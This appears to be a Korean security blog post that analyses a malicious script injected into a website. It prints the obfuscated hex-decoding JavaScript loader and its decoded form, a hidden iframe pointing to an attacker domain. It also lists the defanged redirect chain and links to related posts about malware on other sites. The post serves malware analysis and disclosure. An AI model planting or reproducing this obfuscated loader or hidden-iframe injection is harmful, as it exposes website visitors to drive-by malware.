[악성 스크립트]
function c102916999516m4943389011261(m4943389011648)
{
function m4943389011a31()
{
var m4943389011e19=16;
return m4943389011e19;
}
return (parseInt(m4943389011648,m4943389011a31()));
}
function m49433890125ea(m49433890129d2)
{
var m4943389013589=2;
var m4943389012dba='';
m4943389014143=String.fromCharCode;
for(m49433890131a2=0;m49433890131a2<m49433890129d2.length;m49433890131a2+=m4943389013589)
{
m4943389012dba+=(m4943389014143(c102916999516m4943389011261(m49433890129d2.substr(m49433890131a2,m4943389013589))));
}
return m4943389012dba;
}
var z89='';
var m4943389014917='3C7'+z89+'3637'+z89+'2697'+z89+'07'+z89+'43E696628216D7'+z89+'96961297'+z8[중략]';
document.write(m49433890125ea(m4943389014917))
[디코딩]
---------------------------
웹 페이지의 메시지
---------------------------
<script>if(!myia){document.write(unescape( '%3c%69%66%72%61[중략]%65%3e'));}var myia=true;</script>
---------------------------
확인
---------------------------
[HEX 디코딩]
<script>if(!myia){document.write(unescape( '<iframe name=c10 src='hXXp://gogo2me.net/.go/check.html?'+Math.round(Math.random()*441780)+'53ebedca2' width=796 height=555 style='display: none'></iframe>'));}var myia=true;</script>
[링크 정리]
최초 페이지 : hxxp://insaweb9.cafe24.com/bbs/login.php?id=best
iframe 연결 : hxxp://gogo2me.net/.go/check.html?
frame 연결 : hxxp://ww1.gogo2me.net
최종 연결 : hxxp://dsparking.com/?epl=BuMcp4amXBdAWsCMnIJ0Z4C2x48RJBROkdzFv8QqzkJ4Ay1CXlxfQ6mi61vN0pPAoOmoXXBgdmlh6Kicts9kZcc0IhH9Vq6Gtobv5oNuGaFAFOK6wEvwlRCIYioJpGfY9zPLjIhnGiFIJ2eWQ8ruVVzYpcOFgqBaZ5r975LUC4SpplPK4OQBu9zgFyDHBgMK6glEw1kwqCot4FuQc67dqY1xmsphQpFN5T73rcKLa0f5wXH3m1H-yQ4BxYYmEkVIc9ocXX2MFxjYFlmSTLGs7d863edJt4Xr6E7PcBlwb6z67kPP1cfgtBAuo-KlChGDjZMx9m2rLj97RSSSkjTj43wKfbaH8Uq-DD3UrmIZKAjSGDqjUueK1pbNkCdH-B2oSs5TQl45ngI8oFxUs-WJXFoTnCn8MPuS4TAaUI8GqAcyDQDUo5Ge9FBPmZ7aFE9FAIB6IKMB6dGoJz31QKb6SU95oMmUpyKUUT-lR6ZN9YNGeoIpHo1qTzUNPfVTI9J7qpn0VNEsLQEw8P__v_D__7_y_wMAAECAXw8AANoeP0ZZUyZZQTE2aFpClAEAAPA
hxxp://ww1.gogo2me.net?epl=Up_MRQiLp0w607k_C8ICdwDLC8kfEgqnSO7iRrI_BtcJeODFzQ-jZnaN67qWUo1O8zsWeCBxWS_adJTTtpsoiD55i0SVyKgwITinR5GwBulQgTiGXwppNtIRtmLj3tJv_BrvV0IQN0L51Aoyhr_9YAK-E115DY09ZgVSM6499eXEPnyiMn7DYN0SZ9c8WImC3STQbi3pe1VjdwCL8Uo6CvfV6xFjJk0-ETP50EiGwQKsRgWbySVlcjpwttDVpv7seO49LtPh9oBcg3M9ihhVJTVe3XBLfe9ShwhI4V4UxTHu-Z_kOUxbmI2ytetLI1t-o412qJYgmGFxsZ1TBHKDd4fAIGQxWQxYbXBhxtJ1uU07PxomPJgwqWydab3L8vO8AxC-sCxlMmKaaUoPU5t6apjQJrUR06b01KaYplH_VAU01KapBzSNpiGASU8w0UzANE2mIgaaJhMAAKYJEyYAE2DCHBMWATDw__-_8P__v_L_AwAAQIDfDAAAWF5I_llTJllBMTZoWkJqAQAA8A
'security > 악성코드 유포' 카테고리의 다른 글
http://www.inews24.com 악성코드 유포중 ! (0) | 2012.09.01 |
---|---|
인제대학교 일어일문학과 http://homepage.inje.ac.kr/~japan/xe/index.php?mid=main 악성 코드 유포중 ! (0) | 2012.08.25 |
악성코드 유포중에 있는 inews24.com 악성 스크립트 정리 ! (0) | 2012.06.30 |
inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 ! (0) | 2012.06.29 |
오랜만에 풀어본 난독화 스크립트! (0) | 2012.06.29 |